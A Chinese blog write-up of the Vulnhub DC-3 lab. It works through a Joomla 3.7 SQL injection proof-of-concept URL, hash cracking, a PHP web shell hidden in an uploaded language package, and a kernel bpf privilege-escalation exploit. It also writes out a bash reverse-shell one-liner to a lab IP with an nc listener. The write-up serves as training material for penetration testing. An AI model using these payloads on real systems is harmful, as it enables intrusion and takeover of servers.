

r0ckyzzz's Blog.

Vulnhub靶机DC-3通关笔记

r0ckyzzz's Blog.

Vulnhub靶机DC-3通关笔记

vulnhub

Word count: 514Reading time: 2 min

 2020/03/08   Share

• 
• 
• 
• 
• 

Vulnhub靶机DC-3通关笔记

¶前言

乘热打铁继续做

下载地址：https://www.vulnhub.com/entry/dc-3,312/

¶开始

扫描端口

只有80端口开放
访问

只有一个flag 一个入口点没有线索
目标是拿到root权限

用whatweb看看是用什么写的

用的是Joomla！写的

用joomscan来扫描一下

https://github.com/rezasp/joomscan

版本是3.7

去搜索一下3.7的漏洞找到一个sql注入漏洞

https://firedebug.github.io/PHP/Joomla3.7.0SQL注入/

http://192.168.123.6/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)
用poc试一下果然存在这个漏洞 还是root权限

在github找到个exp
https://github.com/stefanlucas/Exploit-Joomla

得到admin的hash

cmd5解不出来？？
卡壳了

后来看了wp才知道要用kali自带的字典rockyou来解 好吧。。

我Macbook的hashcat好像破解不了这个blowfish密码 硬件不支持

我直接拿了wp的密码登陆了

接下来就是后台getshell

具体步骤参考
https://klionsec.github.io/2017/05/18/joomla-3-70-exp-getshell/

简单来说就是下载官方的模版

http://joomlacode.org/gf/download/frsrelease/20033/163761/zh-CN_joomla_lang_full_3.4.1v2.zip
在模版中加入shell.php

然后在install.xml中加入shell.php

打包上传

接着访问shell.php
http://192.168.123.6/administrator/language/zh-CN/shell.php
导入蚁剑就好了

是www-data权限现在的目标就是提权

ubuntu16.04的系统
找一下有没有本地权限提升的exp

找到一个符合的
Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ bpf(BPF_PROG_LOAD) Privilege Escalation

直接去下载exp

上传到/tmp目录
赋予执行权限

之后
./compile.sh
./doubleput
得到root权限

最终的flag

少了一步就是在蚁剑终端反弹shell到kali

bash -c ‘bash -i >& /dev/tcp/192.168.123.4/5555 0>&1’

kali终端
nc -lvvp 5555

¶总结

这次的渗透还是比较轻松的 主要是在密码破解上卡壳了 拿到了加密的blowfish在cmd5找不到就没招了，没有想到还能用hashcat来破解

Author：r0ckyzzz

原文链接：http://r0cky.xyz/2020/03/08/Vulnhub%E9%9D%B6%E6%9C%BADC-3%E9%80%9A%E5%85%B3%E7%AC%94%E8%AE%B0/

发表日期：March 8th 2020, 5:49:00 pm

更新日期：March 15th 2020, 4:39:43 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Vulnhub靶机DC-4通关笔记
• Previous Post
  Vulnhub靶机DC-2通关笔记

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. Vulnhub靶机DC-3通关笔记
   1. 1.1. ¶前言
   2. 1.2. ¶开始
   3. 1.3. ¶总结



• Archive
• Tag
• Cate

Total : 37

2021

• 08/02利用captcha_trainer进行验证码识别

2020

• 04/04HTB靶机Jeeves通关笔记
• 04/03HTB靶机Shocker、Blue、Bank通关笔记
• 04/02HTB靶机Lame、Leagcy、Bashed、Popcorn通关笔记
• 03/27Vulnhub靶机LiterallyVulnerable通关笔记
• 03/26Vulnhub靶机SickOS1.1通关笔记
• 03/25# Vulnhub靶机SkyTower通关笔记
• 03/24Vulnhub靶机VulnOS2通关笔记
• 03/24Vulnhub靶机pwnlab_init通关笔记
• 03/23Vulnhub靶机Stapler通关笔记
• 03/22Vulnhub靶机FristiLeaks_1.3通关笔记
• 03/21Vulnhub靶机DeRPnStiNK通关笔记
• 03/21Vulnhub靶机LordOfTheRoot_1.0.1通关笔记
• 03/20Vulnhub靶机W1r3s通关笔记
• 03/19Vulnhub靶机Tr0ll:1通关笔记
• 03/19Vulnhub靶机Wintermute通关笔记
• 03/18Vulnhub靶机Raven2通关笔记
• 03/17Vulnhub靶机Raven1通关笔记
• 03/17Vulnhub靶机Lampiao通关笔记
• 03/16Vulnhub靶机GoldenEye通关笔记
• 03/15Vulnhub靶机DC-9通关笔记
• 03/15Vulnhub靶机DC-8通关笔记
• 03/14Vulnhub靶机DC-7通关笔记
• 03/13Vulnhub靶机DC-6通关笔记
• 03/10Vulnhub靶机DC-5通关笔记
• 03/10Vulnhub靶机DC-4通关笔记
• 03/08Vulnhub靶机DC-3通关笔记
• 03/06Vulnhub靶机DC-2通关笔记
• 03/05Vulnhub靶机DC-1通关笔记
• 02/22局域网DNS劫持
• 02/22Wifi-pumpkin
• 02/22攻防世界Web进阶区部分writeup
• 02/22攻防世界Web进阶区部分writeup 2
• 02/22CISCN Web love_math
• 02/22CVE-2018-4878复现
• 02/22CISCN Web1 Justsoso
• 02/22免杀相关

Security security ctf vulnhub Vulnhub OSCP vulhub Linux环境变量 HTB htb



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

